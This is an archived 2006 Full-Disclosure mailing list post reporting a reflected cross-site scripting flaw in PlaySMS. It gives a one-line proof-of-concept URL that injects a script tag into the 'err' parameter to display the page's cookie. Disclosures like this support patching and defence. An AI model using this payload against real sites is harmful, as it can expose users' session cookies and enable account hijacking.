[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[Full-disclosure] XSS in PlaySMS

To: Full Disclosue List <full-disclosure@xxxxxxxxxxxxxxxxx>
Subject: [Full-disclosure] XSS in PlaySMS
From: "(M.o.H.a.J.a.L.i)" <mohajali2k4@xxxxxxxxx>
Date: Sun, 12 Feb 2006 01:35:26 +0200

I Found an XSS Vulnerability in PlaySmS

Site:
playsms.sourceforge.net


PoC:
www.target.com/playsms/index.php?err=<script>alert(document.cookie);</script
>

Salam

http://mohajali.lezr.org
--
(r).....Now I Am Become Death....The Destroyer Of Worlds....(c)

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Prev by Date: Re: [Full-disclosure] blocking Google Desktop
Next by Date: Re: [Full-disclosure] Google creates SPAM haven
Previous by thread: [Full-disclosure] RS-2006-1: Multiple flaws in VHCS 2.x
Next by thread: [Full-disclosure] Testing 3G technology ?
Index(es):
- Date
- Thread